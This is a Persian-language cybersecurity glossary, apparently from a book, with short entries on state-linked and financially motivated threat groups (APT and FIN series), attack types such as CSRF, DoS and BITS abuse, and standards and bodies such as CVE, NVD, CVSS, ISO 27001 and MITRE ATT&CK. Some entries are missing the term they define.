APT19یک گروه تهدید مستقر در چین است که صنایع مختلفی از جمله دفاع، مالی، انرژی، داروسازی، مخابرات، فناوری پیشرفته، آموزش، تولید و خدمات حقوقی را هدف قرار داده است. در سال 2017، یک کمپین فیشینگ برای هدف قرار دادن هفت شرکت حقوقی و سرمایه گذاری مورد استفاده قرار گرفت. برخی از تحلیلگران APT19و Deep Panda را به عنوان یک گروه دنبال می کنند، اما اطلاعات منبع باز مشخص نیست که آیا گروه‌ها یکسان هستند یا خیر.

APT28یک گروه تهدید است که به واحد نظامی 26165 اداره اطلاعات اصلی ستاد کل روسی و مرکز خدمات ویژه اصلی نسبت داده شده است. این گروه حداقل از سال 2004 فعال بوده است. گزارش شده است که APT28در تلاش برای مداخله در انتخابات ریاست جمهوری ایالات متحده، کمپین هیلاری کلینتون، کمیته ملی دموکرات و کمیته مبارزات انتخاباتی دموکرات کنگره را در سال 2016 به خطر انداخت. در سال 2018، ایالات متحده پنج افسر GRU واحد 26165 مرتبط با APT28را به دلیل عملیات سایبری (از جمله عملیات دسترسی نزدیک) که بین سال‌های 2014 و 2018 علیه آژانس جهانی ضد دوپینگ ( WADA)، آژانس ضد دوپینگ ایالات متحده انجام شد، متهم کرد. تاسیسات هسته ای ایالات متحده، سازمان منع سلاح های شیمیایی ( OPCW) ، آزمایشگاه مواد شیمیایی Spiez سوئیس، و سازمان های دیگر. برخی از این ها با کمک واحد 74455 GRU انجام شد که به آن تیم کرم شنی نیز گفته می شود.

APT29یک گروه تهدید است که به سرویس اطلاعات خارجی روسیه (SVR ) نسبت داده شده است. آنها حداقل از سال 2008 فعالیت می کنند و اغلب شبکه های دولتی در اروپا و کشورهای عضو ناتو، مؤسسات تحقیقاتی و اتاق های فکر را هدف قرار می دهند. گزارش شده است که APT29از تابستان 2015 کمیته ملی دموکرات را به خطر انداخت. در آوریل 2021، دولت‌های ایالات متحده و بریتانیا عملیات سایبری به خطر افتادن زنجیره تامین SolarWinds را به SVR نسبت دادند. بیانیه های عمومی شامل استناد به APT29، Cozy Bear، و The Dukes بود. قربانیان این کمپین شامل دولت، مشاوره، فناوری، مخابرات و سازمان های دیگر در آمریکای شمالی، اروپا، آسیا و خاورمیانه بودند. گزارش‌های صنعتی به بازیگران درگیر در این کمپین به‌عنوان UNC2452، NOBELIUM، StellarParticle و Dark Halo اشاره می‌کنند.

APT3 یک گروه تهدید مستقر در چین است که محققان آن را به وزارت امنیت دولتی چین نسبت داده‌اند. این گروه مسئول کمپین هایی است که به عنوان عملیات روباه مخفی، عملیات گرگ مخفی، و عملیات Double Tap شناخته می شوند. از ژوئن 2015، به نظر می رسد این گروه از هدف قرار دادن قربانیان عمدتاً ایالات متحده به سازمان های عمدتاً سیاسی در هنگ کنگ تغییر مکان داده است.در سال 2017، MITER یک طرح شبیه سازی دشمن APT3را توسعه داد.

APT30 یک گروه تهدید است که مشکوک به ارتباط با دولت چین است. در حالی که Naikon برخی از ویژگی‌های مشترک را با APT30دارد، به نظر نمی‌رسد این دو گروه دقیقاً مطابقت داشته باشند.

APT32یک گروه تهدید کننده مشکوک مستقر در ویتنام است که حداقل از سال 2014 فعال بوده است. این گروه چندین صنعت بخش خصوصی و همچنین دولت های خارجی، مخالفان و روزنامه نگاران را با تمرکز شدید بر کشورهای آسیای جنوب شرقی مانند ویتنام، فیلیپین، هدف قرار داده است. لائوس و کامبوج آنها به طور گسترده از مصالحه های استراتژیک وب برای به خطر انداختن قربانیان استفاده کرده اند.

APT33یک گروه تهدیدکننده مشکوک ایرانی است که حداقل از سال 2013 عملیاتی را انجام داده است. این گروه سازمان‌هایی را در چندین صنعت در ایالات متحده، عربستان سعودی و کره جنوبی هدف قرار داده است که علاقه خاصی به بخش‌های هوانوردی و انرژی دارند.

یک گروه جاسوسی سایبری تحت حمایت دولت کره شمالی است که حداقل از سال 2012 فعال بوده است. این گروه عمدتاً قربانیان را در کره جنوبی، اما همچنین در ژاپن، ویتنام، روسیه، نپال، چین، هند، رومانی، کویت و نیز هدف قرار داده است. سایر مناطق خاورمیانه APT37همچنین بین سال‌های 2016-2018 به کمپین‌های زیر مرتبط شده است: عملیات سپیده‌دم، عملیات Erebus، زمان طلایی، سال نو شیطانی، آیا شاد هستید؟، فری میلک، حقوق بشر کره شمالی، و سال نو شیطانی 2018.تعاریف گروه کره شمالی دارای همپوشانی قابل توجهی هستند و برخی از محققان امنیتی همه فعالیت های سایبری تحت حمایت دولت کره شمالی را تحت نام گروه لازاروس به جای ردیابی خوشه ها یا زیر گروه ها گزارش می دهند.

APT38یک گروه تهدید تحت حمایت دولت کره شمالی است که در عملیات سایبری مالی تخصص دارد. آن را به اداره کل شناسایی نسبت داده اند. APT38حداقل از سال 2014 فعال است، بانک‌ها، مؤسسات مالی، کازینوها، صرافی‌های ارزهای دیجیتال، نقاط پایانی سیستم SWIFT و دستگاه‌های خودپرداز را در حداقل 38 کشور در سراسر جهان هدف قرار داده است. عملیات مهم شامل دزدی بانک بنگلادش در سال 2016، که طی آن APT38 81 میلیون دلار سرقت کرد، و همچنین حملات علیه Bancomext (2018) و Banco de Chile برخی از حملات آنها مخرب بوده است. تعاریف گروه کره شمالی دارای همپوشانی قابل توجهی هستند و برخی از محققان امنیتی همه فعالیت های سایبری تحت حمایت دولت کره شمالی را تحت نام گروه لازاروس به جای ردیابی خوشه ها یا زیر گروه ها گزارش می دهند.

APT39یکی از چندین نام برای فعالیت های جاسوسی سایبری است که حداقل از سال 2014 توسط وزارت اطلاعات و امنیت ایران ( MOIS) از طریق شرکت پیشرو Rana Intelligence Computing انجام می شود. در سراسر آسیا، آفریقا، اروپا و آمریکای شمالی برای ردیابی افراد و نهادهایی که توسط MOIS یک تهدید محسوب می‌شوند.

یک گروه تهدید است که محققان آن را به عنوان گروه جاسوسی تحت حمایت دولت چین ارزیابی کرده‌اند که عملیات‌هایی با انگیزه مالی نیز انجام می‌دهد. APT41 که حداقل از سال 2012 فعال است، مشاهده شده است که مراقبت های بهداشتی، مخابرات، فناوری و صنایع بازی های ویدیویی را در 14 کشور هدف قرار داده است. APT41 حداقل تا حدی با گزارش های عمومی در مورد گروه هایی از جمله BARIUM و Winnti Group همپوشانی دارد.

ممکن است دشمنان از کارهای BITS برای اجرا یا پاکسازی مداوم پس از بارهای مخرب سوء استفاده کنند. سرویس انتقال هوشمند پس‌زمینه ویندوز (BITS) یک مکانیسم انتقال فایل با پهنای باند کم و ناهمزمان است که از طریق Component Object Model (COM) در معرض دید قرار می‌گیرد. BITS معمولاً توسط به‌روزرسانی‌ها، پیام‌رسان‌ها و سایر برنامه‌های کاربردی استفاده می‌شود که ترجیح می‌دهند در پس‌زمینه (با استفاده از پهنای باند غیرفعال موجود) بدون ایجاد وقفه در سایر برنامه‌های شبکه کار کنند. وظایف انتقال فایل به صورت کارهای BITS اجرا می شوند که حاوی صفی از یک یا چند عملیات فایل هستند. رابط برای ایجاد و مدیریت مشاغل BITS از طریق PowerShell و ابزار BITSadmin قابل دسترسی است. ممکن است دشمنان پس از اجرای کدهای مخرب از BITS برای دانلود، اجرا و حتی پاکسازی سوء استفاده کنند. وظایف BITS در پایگاه داده شغلی BITS، بدون فایل‌های جدید یا تغییرات رجیستری وجود دارند و اغلب توسط فایروال‌های میزبان مجاز هستند. اجرای فعال شده BITS همچنین ممکن است با ایجاد مشاغل طولانی مدت (حداکثر طول عمر پیش فرض 90 روز و قابل تمدید است) یا فراخوانی یک برنامه دلخواه هنگام تکمیل کار یا خطا (از جمله پس از راه اندازی مجدد سیستم) تداوم را فعال کند.عملکردهای آپلود BITS را نیز می توان برای انجام Exfiltration Over Alternative Protocol استفاده کرد.

حمله‌ای است که کاربران احراز هویت را مجبور می‌کند تا درخواست خود را به یک برنامه وب ارسال کنند که در حال حاضر در برابر آن احراز هویت شده است. حملات CSRF از اعتمادی که یک برنامه وب به یک کاربر معتبر دارد سوء استفاده می‌کند. اگر CSRF نتواند بین درخواست ایجاد شده توسط یک کاربر و درخواست ایجاد شده توسط کاربر بدون رضایت آنها تمایز قائل شود، حمله CSRF از آن استفاده می‌کند. هدف مهاجم از انجام حمله CSRF این است که کاربر را مجبور به ارائه درخواست تغییر وضعیت کند.

یک فرهنگ لغت جامع و طبقه‌بندی حملات شناخته شده است که فهرست عمومی الگوهای حملات رایج را در اختیار عموم قرار می‌دهد که به کاربران کمک می‌کند بفهمند چگونه دشمنان از نقاط ضعف برنامه‌ها و سایر قابلیت‌های مجهز به سایبر استفاده می‌کنند.

NVDمسئول ارائه ابرداده‌های مختلف به رکوردهای CVE پس از انتشار آنها در فهرست CVE بوده است. انواع داده هایی که در حال حاضر توسط کارکنان NVD ارائه می شود عبارتند از: سیستم امتیازدهی آسیب پذیری رایج نسخه 3.1 (CVSS نسخه 3.1) سیستم امتیازدهی آسیب پذیری رایج نسخه 2.0 (CVSS نسخه 2.0) شمارش نقاط ضعف مشترک (CWE) پیکربندی های سرشماری پلت فرم مشترک ( CPE) برچسب های مرجع این نوع داده ها به عنوان دسته های ارسال در CVMAP نامیده می شوند. همانطور که برنامه CVE در طول زمان بالغ و تکامل یافته است، حجم فزاینده ای از انتشارات CVE نشان داده است که سیستم های نگهداری جدیدی برای ارائه به موقع این نقاط داده و در عین حال حفظ ثبات و کیفیت مورد نیاز است. برای پشتیبانی از این نیاز، NVD برنامه جدیدی را برای ارسال ابرداده های CVE از مقامات شماره گذاری CVE (CNA) و ارائه دهندگان مجاز داده ( ADP) با نام " CVMAP " آغاز کرده است. بر اساس داده‌های ارائه شده به فهرست CVE توسط CNA و ADP، NVD تمام اطلاعات ارائه‌شده را ارزیابی می‌کند و ابرداده‌های مرتبط را ارزیابی می‌کند، اگر اطلاعات ارائه‌شده با ارزیابی کارکنان NVD سازگار باشد، ارائه‌دهندگان داده‌ها می‌توانند سطح پذیرش خود را برای دسته ارسال ارائه‌شده افزایش دهند. . هنگامی که یک ارائه‌دهنده داده به سطح پذیرش ارائه‌دهنده رسید، اطلاعات آنها کمتر ممیزی می‌شوند و بلافاصله در وب‌سایت و فیدهای داده منتشر می‌شوند. این برنامه در هنگام ارائه استانداردها و اطلاعات مبتنی بر متن منجر به اقدامات منسجم‌تر در سراسر جامعه امنیت اطلاعات می‌شود، فشار ناشی از حجم فزاینده انتشارات CVE بر کارکنان NVD را کاهش می‌دهد و به حفظ ثبات داده ها و کیفیت اطلاعات برای همه مصرف‌کنندگان CVE ادامه می‌دهد.

فهرستی از نقص های امنیتی کامپیوتری است که به صورت عمومی فاش شده است. وقتی شخصی به یک CVE اشاره می کند، منظورش یک نقص امنیتی است که به آن یک شماره شناسه CVE اختصاص داده شده است. توصیه های امنیتی صادر شده توسط فروشندگان و محققان تقریباً همیشه حداقل یک شناسه CVE را ذکر می‌کنند. CVE به متخصصان فناوری اطلاعات کمک می کند تا تلاش های خود را برای اولویت بندی و رفع این آسیب پذیری ها برای ایمن تر کردن سیستم های رایانه ای هماهنگ کنند.

یک روش استاندارد برای توصیف و شناسایی کلاس‌های برنامه‌ها، سیستم‌های عامل و دستگاه‌های سخت‌افزاری است که در میان دارایی‌های محاسباتی یک شرکت وجود دارد.

سیستم امتیازدهی مشترک آسیب پذیری ک چارچوب باز برای ارتباط با ویژگی ها و شدت آسیب پذیری‌های نرم‌افزار است. CVSS از سه گروه متریک تشکیل شده است: پایه، زمانی و محیطی.

مدل مدیریت تاب آوری CERT (CERT-RMM) پایه و اساس یک رویکرد بهبود فرآیند برای مدیریت تاب آوری عملیاتی است. این مدل شیوه‌های سازمانی ضروری را که برای مدیریت انعطاف‌پذیری عملیاتی ضروری هستند، تعریف می‌کند. شما می توانید از CERT-RMM برای تعیین توانایی سازمان خود برای مدیریت انعطاف پذیری، تعیین اهداف و توسعه برنامه هایی برای رفع شکاف های شناسایی شده استفاده کنید. با استفاده از نمای فرآیند، CERT-RMM می تواند به سازمان شما کمک کند تا با عملکرد بالغ و قابل پیش بینی به استرس پاسخ دهد.

یکپارچه سازی مدل بلوغ قابلیت (CMMI) یک برنامه آموزشی و ارزیابی بهبود سطح فرآیند است. تحت مدیریت موسسه CMMI، یکی از شرکت های تابعه ISACA، در دانشگاه کارنگی ملون (CMU) توسعه یافته است. این مدل توسط بسیاری از قراردادهای دولت ایالات متحده، به ویژه در توسعه نرم افزار مورد نیاز است. یکپارچه سازی مدل بلوغ قابلیت به سازمان‌ها کمک می‌کند تا بهبود فرآیند را ساده کرده و رفتارهایی را تشویق کنند که خطرات را در توسعه نرم افزار، محصول و خدمات کاهش می دهد. این مدل، چارچوبی را برای توسعه محصولات و خدمات بهتر، با مجموعه‌ای از ارزیابی‌های توسعه فرآیند و خدمات، استقرار و مدیریت خدمات، و کسب محصول و خدمات، به کسب‌وکارها ارائه می‌کند.

مرکز تعالی دفاع سایبری یک مرکز دفاع سایبری چند ملیتی و میان رشته ای است. ماموریت این مرکز افزایش قابلیت، همکاری و اشتراک اطلاعات بین ناتو، متحدان و شرکا در دفاع سایبری است. قلب مرکز دفاع سایبری، گروهی متنوع از کارشناسان بین المللی در امنیت سایبری است. این گروه شامل دانشمندان حقوقی، کارشناسان سیاست و استراتژی و همچنین محققان فناوری با پیشینه نظامی، دولتی و صنعتی می باشد. این مرکز توسط کشورهای عضو تا به امروز اتریش، بلژیک، جمهوری چک، استونی، فنلاند، فرانسه، آلمان، یونان، مجارستان، ایتالیا، لتونی، لیتوانی، هلند، لهستان، پرتغال، اسلواکی، اسپانیا، سوئد، پرسنل و تامین مالی می شود. ترکیه، بریتانیا و ایالات متحده آمریکا. استرالیا، بلغارستان، دانمارک، ژاپن، نروژ، رومانی، کرواسی و بسیاری دیگر نیز در مسیر پیوستن به مرکز هستند.

کنترل‌های (CIS)که قبلاً به عنوان کنترل‌های امنیتی حیاتی شناخته می‌شد مجموعه‌ای از اقدامات توصیه‌شده برای دفاع سایبری هستند که راه‌های مشخص و عملی را برای توقف فراگیرترین و خطرناک‌ترین حملات امروزی ارائه می‌دهند. SANS از کنترل های CIS با آموزش، تحقیق و صدور گواهینامه پشتیبانی می کند.

Csc 20 مجموعه‌ای از 20 کنترل (که گاهی اوقات SANS Top 20 نامیده می‌شود) است که برای کمک به سازمان ها طراحی شده است تا از سیستم ها و داده های خود در برابر بردارهای حمله شناخته شده محافظت کنند. همچنین می توانند راهنمای موثری برای شرکت هایی باشند که هنوز برنامه امنیتی منسجمی ندارند.

آژانس امنیت سایبری و امنیت زیرساخت یک آژانس فدرال ایالات متحده است که یک جزء عملیاتی تحت نظارت وزارت امنیت داخلی است. فعالیت های آن در ادامه ریاست حفاظت ملی و برنامه ها می باشد. آژانس امنیت سایبری و امنیت زیرساخت با شرکای خود برای دفاع در برابر تهدیدات امروزی و برای ایجاد زیرساخت ایمن‌تر و انعطاف‌پذیرتر برای آینده همکاری می‌کند.

حمله (DoS) حمله‌ای است که به معنای خاموش کردن یک دستگاه یا شبکه است و باعث می‌شود آندستگاه یا شبکه برای کاربران مورد نظر خود غیرقابل دسترسی باشد. حملات DoS این کار را با غرق کردن هدف در ترافیک یا ارسال اطلاعاتی که باعث تصادف می‌شود، انجام می‌دهد. در هر دو مورد، حمله DoS کاربران مشروع (یعنی کارمندان، اعضا یا دارندگان حساب) را از خدمات یا منبعی که انتظار داشتند محروم می‌کند.

حملات انکار سرویس توزیع شده یک زیر کلاس از حملات انکار سرویس هستند. یک حمله DDoS شامل چندین دستگاه متصل آنلاین است که در مجموع به عنوان بات نت شناخته می شوند، که برای غلبه بر یک وب سایت هدف با ترافیک جعلی استفاده می شود.

یک استراتژی امنیت اطلاعات برای محافظت از داده های شرکت. DLP مجموعه ای از ابزارها و فرآیندهایی است که برای اطمینان از گم شدن، سوء استفاده یا دسترسی کاربران غیرمجاز، چه در داخل یا خارج از سازمان، داده های حساس مورد استفاده قرار می گیرد.

DNS از نام یک وب سایت برای هدایت ترافیک به آدرس IP متعلق به خود استفاده می کند. برای مثال Amazon.com باید شما را به وب سایت آمازون ببرد. در طول این نوع حمله که پیچیده است و به روش های مختلفی ظاهر می شود، مجرمان سایبری می توانند شما را برای اهداف خود به سایت دیگری هدایت کنند. این حمله از ارتباط رفت و برگشت بین کلاینت ها و سرورها استفاده می کند.

راه حل های تشخیص و پاسخ نقطه پایانی برای شناسایی و پاسخ به ناهنجاری های نقطه پایانی طراحی شده اند. راه‌حل‌های EDR برای جایگزینی راه‌حل‌های IDPS یا فایروال‌ها طراحی نشده‌اند، اما عملکرد آن‌ها را با ارائه دید و تحلیل عمیق نقطه پایانی گسترش می‌دهند. EDR از مجموعه داده های مختلف استفاده می کند که همبستگی و تشخیص پیشرفته را تسهیل می کند.

FIN10یک گروه تهدید با انگیزه مالی است که حداقل از سال 2013 تا 2016 سازمان‌هایی را در آمریکای شمالی هدف قرار داده است. این گروه از داده‌های سرقت شده از قربانیان برای اخاذی از سازمان‌ها استفاده می‌کند.

FIN4یک گروه تهدید با انگیزه مالی است که حداقل از سال 2013 اطلاعات محرمانه مربوط به بازار مالی عمومی، به ویژه در مورد شرکت های مراقبت های بهداشتی و دارویی را هدف قرار داده است. FIN4 از این نظر منحصر به فرد است که قربانیان را با بدافزارهای معمولی و دائمی آلوده نمی‌کند، بلکه بر روی گرفتن اعتبارنامه‌های مجاز برای دسترسی به ایمیل و سایر مکاتبات غیر عمومی تمرکز می‌کنند.

FIN5 یک گروه تهدید با انگیزه مالی است که اطلاعات شناسایی شخصی و اطلاعات کارت پرداخت را هدف قرار داده است. این گروه حداقل از سال 2008 فعال بوده و صنعت رستوران، بازی و هتل را هدف قرار داده است. این گروه متشکل از بازیگرانی است که احتمالاً روسی صحبت می کنند.

FIN6یک گروه جرایم سایبری است که داده‌های کارت پرداخت را به سرقت برده و آن‌ها را برای سود در بازارهای زیرزمینی فروخته است. این گروه به شدت سیستم‌های نقطه فروش (PoS)را در بخش مهمان‌نوازی و خرده‌فروشی مورد هدف قرار داده و به خطر انداخته است.

FIN7یک گروه تهدید با انگیزه مالی است که از سال 2013 عمدتاً بخش‌های خرده‌فروشی، رستوران‌ها و مهمان‌نوازی ایالات متحده را هدف قرار داده و اغلب از بدافزارهای نقطه‌فروش استفاده می‌کند. بخشی از FIN7 از شرکتی به نام Combi Security تمام شد. از سال 2020، FIN7 عملیات خود را به رویکرد شکار بازی بزرگ تغییر داد، از جمله استفاده از باج‌افزار REvil و باج‌افزار خود به عنوان سرویس ، FIN7 .(RaaS)ممکن است به گروه Carbanak مرتبط باشد، اما به نظر می رسد که چندین گروه از بدافزار Carbanak استفاده می کنند و بنابراین به طور جداگانه ردیابی می شوند.

FIN8 یک گروه تهدید با انگیزه مالی است که برای راه‌اندازی کمپین‌های spearphishing متناسب با خرده‌فروشی، رستوران‌ها و صنایع مهمان‌نوازی شناخته شده است.

FISMA یک قانون ایالات متحده است که هر آژانس فدرال را ملزم به توسعه، مستندسازی و اجرای برنامه ای در سطح آژانس برای تأمین امنیت اطلاعات برای سیستم های اطلاعاتی و داده های خود می کند. این قانون اهمیت امنیت اطلاعات را برای منافع اقتصادی و امنیت ملی ایالات متحده به رسمیت شناخت.

سازمانی که توسط و برای متخصصان امنیت سیستم های اطلاعاتی اداره می شود تا به آژانس های فدرال در انجام مسئولیت های امنیتی، آموزش و آموزش سیستم های اطلاعاتی خود کمک کنند.

شاخص جهانی امنیت سایبری یک مرجع قابل اعتماد است که تعهد کشورها به امنیت سایبری را در سطح جهانی برای افزایش آگاهی از اهمیت و ابعاد مختلف موضوع اندازه گیری می کند. از آنجایی که امنیت سایبری کاربرد وسیعی دارد و صنایع و بخش‌های مختلف را در بر می‌گیرد، سطح توسعه یا مشارکت هر کشور بر اساس پنج رکن ارزیابی می‌شود: (1) اقدامات قانونی، (2) اقدامات فنی، (3) اقدامات سازمانی، (4) توسعه ظرفیت، و (5) همکاری - و سپس به یک نمره کلی تجمیع می شود. GCI بر اساس رویکرد و ابتکار چند ذی‌نفع، از ظرفیت و تخصص سازمان‌ها با هدف بهبود کیفیت نظرسنجی، تقویت همکاری‌های بین‌المللی و ترویج تبادل دانش استفاده میکند. دستور کار جهانی امنیت سایبری اساس و چارچوب کلی این ابتکار را فراهم می کند.

سه بخش از یک استراتژی برای مدیریت حاکمیت کلی سازمان، مدیریت ریسک سازمانی و انطباق با مقررات. افراد، شیوه ها و ابزارهای امنیت سایبری نقش کلیدی در GRC برای بسیاری از سازمان ها دارند.

قانون قابل حمل و پاسخگویی بیمه سلامت(HIPAA) در سال 1996 توسط دولت ایالات متحده تصویب شد و قوانین و مقرراتی را برای محافظت از حریم خصوصی اطلاعات سلامت بیمار ( اطلاعات بهداشتی محافظت شده) و امنیت سوابق الکترونیکی ذخیره شده یا ارسال شده توسط یک نهاد تحت پوشش ارائه می کند. ارتباط HIPAA با امنیت سایبری به این گونه است که این قانون سازمان‌های مطابق با HIPAA را موظف می‌کند: همه داده‌های بهداشتی ارسال، ذخیره، دریافت یا تولید شده دارای محرمانگی قوی باشند. این بدان معناست که می‌تواند فقط برای افراد مجاز برای دسترسی، تغییر یا حذف آن در دسترس باشد. همچنین داده ها باید همیشه برای افراد مجاز در دسترس باشد.

برای ارتباط ایمن از طریق یک شبکه کامپیوتری با رمزگذاری اطلاعاتی که از رایانه خود به وب سایت دیگری ارسال می کنید، برای مثال استفاده می شود. این وسیله ای برای اطمینان از حفظ حریم خصوصی، امنیت و همچنین راهی برای احراز هویت است که سایتی که در آن هستید همان سایتی است که قصد بازدید از آن را دارید.

مراکز اشتراک‌گذاری و تجزیه و تحلیل اطلاعات یک سازمان‌های غیرانتفاعی است که منبع اصلی را برای جمع‌آوری اطلاعات در مورد تهدیدات سایبری (در بسیاری موارد در زیرساخت‌های حیاتی) و همچنین به اشتراک‌گذاری اطلاعات دو طرفه بین بخش خصوصی و دولتی در مورد علل اصلی، حوادث و تهدیدها و همچنین به اشتراک‌گذاری تجربه، دانش و تجزیه و تحلیل به عهده دارند.

فناوری اطلاعات استفاده از هر گونه رایانه، ذخیره سازی، شبکه و سایر دستگاه های فیزیکی، زیرساخت ها و فرآیندها برای ایجاد، پردازش، ذخیره، ایمن سازی و تبادل تمامی اشکال داده های الکترونیکی است. به طور معمول، فناوری اطلاعات در زمینه عملیات تجاری استفاده می شود، برخلاف فناوری که برای اهداف شخصی یا سرگرمی استفاده می شود. استفاده تجاری از فناوری اطلاعات شامل فناوری رایانه و ارتباطات راه دور می شود.

امنیت فناوری اطلاعات در هر سازمانی به منظور ایمن نگه داشتن و تحت کنترل نگه داشتن داده ها بسیار مهم است. در فناوری عملیاتی ، ایمنی و در دسترس بودن تجهیزات و فرآیندها غالب است.

Iso 31000 مدیریت ریسک، دستورالعمل ها، اصول، چارچوب و فرآیندی را برای مدیریت ریسک ارائه می دهد. این می تواند توسط هر سازمانی صرف نظر از اندازه، فعالیت یا بخش آن استفاده شود. استفاده از Iso 31000 می‌تواند به سازمان ها کمک کند تا احتمال دستیابی به اهداف را افزایش دهند، شناسایی فرصت ها و تهدیدها را بهبود بخشند و به طور موثر منابع را برای ریسک تخصیص استفاده کنند.

مشخصاتی برای یک سیستم مدیریت امنیت اطلاعات است. گواهینامه ISO 27001برای هر سازمانی اعمال می‌شود که مایل است یا نیاز به رسمیت بخشیدن و بهبود فرآیندهای تجاری پیرامون امنیت اطلاعات، حریم خصوصی و ایمن سازی دارایی های اطلاعاتی خود دارد. یکی از مفاهیم اصلی 27001 شناسایی ریسک ها و سپس تطبیق کنترل ها با ریسک های پیش رو است.

استاندارد 27002مجموعه ای از دستورالعمل های امنیت اطلاعات است که برای کمک به سازمان در پیاده سازی، حفظ و بهبود مدیریت امنیت اطلاعات در نظر گرفته شده است. بسیاری از سازمان ها از ISO 27001و ISO 27002 عنوان چارچوبی برای نشان دادن انطباق با مقررات استفاده می کنند که در آن الزامات دقیق وجود دارد.

ISO 27005 استاندارد بین المللی است که نحوه انجام ارزیابی ریسک امنیت اطلاعات را مطابق با الزامات ISO 27001 شرح می دهد. این استاندارد روش های مدیریت ریسک را تشریح می کند. هدف از مرحله ارزیابی ریسک، فرآیند تجزیه و تحلیل و آنچه ممکن است رخ دهد و پیامدهای آن را تعریف میکند، و به سازمان ها کمک می کند تا تعیین کنند چه کاری باید انجام شود و چه زمانی ریسک را تا حد قابل قبولی کاهش دهند.

اطلاعات تضمین اقداماتی که از اطلاعات و سیستم های اطلاعاتی با اطمینان از در دسترس بودن، یکپارچگی، احراز هویت، محرمانه بودن و عدم انکار آنها محافظت و دفاع می کند.

چارچوبی از سیاست ها و فناوری ها برای اطمینان از دسترسی مناسب افراد مناسب به منابع فناوری است. این به سازمان‌ها کمک می‌کند تا دسترسی به حساب «با حداقل امتیاز» یا «اعتماد صفر» را حفظ کنند، جایی که کارمندان فقط به حداقل داده‌های مورد نیاز برای نقش‌های خود دسترسی دارند.

رمزگذاری مبتنی بر هویت IBE نوعی رمزگذاری با کلید عمومی که در آن کلید عمومی یک کاربر اطلاعات منحصر به فردی در مورد هویت کاربر است، برای مثال آدرس ایمیل کاربر.

ترافیک شبکه را برای امضاهایی که با حملات سایبری شناخته شده مطابقت دارند تجزیه و تحلیل می کند. سیستم‌های پیشگیری از نفوذ ( IPS) بسته‌ها را نیز تجزیه و تحلیل می‌کنند، اما همچنین می‌توانند بسته‌ها را بر اساس نوع حملاتی که شناسایی می‌کند، متوقف کنند و به توقف حمله کمک کنند.

ISACA گواهینامه هایی را برای متخصصان امنیت فناوری اطلاعات، حسابرسی و مدیریت ریسک ارائه می دهد. ISACA همچنین چارچوب COBIT را برای مدیریت و حاکمیت فناوری اطلاعات حفظ می کند. ISACA در سال 1969 توسط گروه کوچکی از افراد که نیاز به منبع متمرکز اطلاعات و راهنمایی در زمینه رو به رشد کنترل های حسابرسی برای سیستم های کامپیوتری را تشخیص دادند، ثبت شد. امروزه ISACA به متخصصان در 180 کشور جهان خدمات ارائه می دهد.

پروتکلی برای ایجاد انجمن های امنیتی و کلیدهای رمزنگاری در یک محیط اینترنت. ISAKMP تنها چارچوبی برای احراز هویت و تبادل کلید ارائه می‌کند و به گونه‌ای طراحی شده است که مستقل از مبادله کلید باشد.

ISAP یک ابتکار آژانس دولتی ایالات متحده برای فعال کردن اتوماسیون و استانداردسازی عملیات امنیتی فنی است. طراحی مبتنی بر استانداردهای آن ممکن است برای کسانی که در بخش خصوصی هستند نیز مفید باشد.

یک سازمان غیرانتفاعی که در آموزش و صدور گواهینامه برای متخصصان امنیت سایبری تخصص دارد. گواهینامه‌ها شامل CISSP است.

سازمانی است که استانداردهای بین‌المللی را در انواع مختلف، از جمله دو استاندارد مدیریت امنیت اطلاعات، ISO 27001 و 27002 ISO ، توسعه می‌دهد.

ISSA یک سازمان غیرانتفاعی و بین المللی متشکل از متخصصان و متخصصان امنیت اطلاعات است.

فردی که مسئولیت حفظ وضعیت امنیتی عملیاتی مناسب برای یک سیستم یا برنامه اطلاعاتی را بر عهده دارد.

ISSPM که گاهی اوقات مدیر امنیت فناوری اطلاعات نیز نامیده می شود، سیاست ها و کنترل های امنیتی را هماهنگ و اجرا می کند و همچنین آسیب پذیری های یک شرکت را ارزیابی می کند. آنها اغلب مسئول پردازش امنیت داده ها و شبکه، مدیریت سیستم های امنیتی و بررسی تخلفات امنیتی هستند

شکلی از حمله به دستگاه تلفن همراه متمرکز بر اندروید که این امکان را به یک مهاجم میدهد تا بتواند اجرای کد دلخواه را روی یک دستگاه در معرض خطر آغاز کند. یک حمله JBOHاغلب از طریق برنامه های در معرض خطر یا مخرب انجام می شود یا تسهیل می شود

برای محافظت از برنامه جاوا در برابر انجام اقدامات بالقوه ناامن، می توانید یک مدیر امنیتی را برای JVM که برنامه در آن اجرا می شود فعال کنید. مدیر امنیتی یک خط مشی امنیتی را اعمال می کند که مجموعه ای از مجوزها (امتیازات دسترسی به سیستم) است که به منابع کد اختصاص داده می شود.

KRI معیارهای شاخص ریسک کلیدی سطح ریسک یک سازمان را بیان می کند و به رهبران امنیتی و کسب و کار اجازه می دهد تا چگونگی تکامل پروفایل ریسک را ردیابی کنند. به عنوان مثال، عملیات امنیت سایبری می تواند از معیارهایی استفاده کند که تهدیدات و آسیب پذیری های گزارش شده توسط ابزارهای مختلف را تحلیل می کند.

شبکه محلی LAN دو یا چند دستگاه که متصل هستند و می توانند منابع را به اشتراک بگذارند.

این چارچوب یک پایگاه دانش و مدل مدیریت شده برای رفتار دشمن سایبری است که منعکس کننده مراحل مختلف چرخه حیات حمله دشمن و پلتفرم‌هایی است که شناخته شده‌اند. این ماتریکس شامل مجموعه ای از تکنیک‌هایی است که توسط دشمنان برای دستیابی به یک هدف خاص استفاده می شود. این اهداف به عنوان تاکتیک ها در ماتریس ATT&CK دسته بندی می شوند. اهداف به صورت خطی از نقطه شناسایی تا هدف نهایی نفوذ یا "ضربه" ارائه می شوند(در فصل دوم این کتاب به صورت کامل در این مورد صحبت شده است).

ماموریت MS-ISAC بهبود وضعیت امنیت سایبری کلی دولت های ایالتی، محلی، قبیله ای و سرزمینی کشور از طریق پیشگیری، حفاظت، واکنش و بازیابی تهدیدات سایبری متمرکز است.

MSSP نظارت و مدیریت برون سپاری دستگاه ها و سیستم های امنیتی را ارائه می دهد. خدمات متداول شامل فایروال مدیریت شده، تشخیص نفوذ، شبکه خصوصی مجازی، اسکن آسیب پذیری و خدمات ضد ویروسی است.

یک سرویس برون سپاری که از کارشناسان خارجی استفاده می کند تا مزایای امنیتی ابزارهایی مانند EDR و شکار پیشگیرانه تهدید را در دسترس مشتریان در تمام سطوح بلوغ قرار دهند.

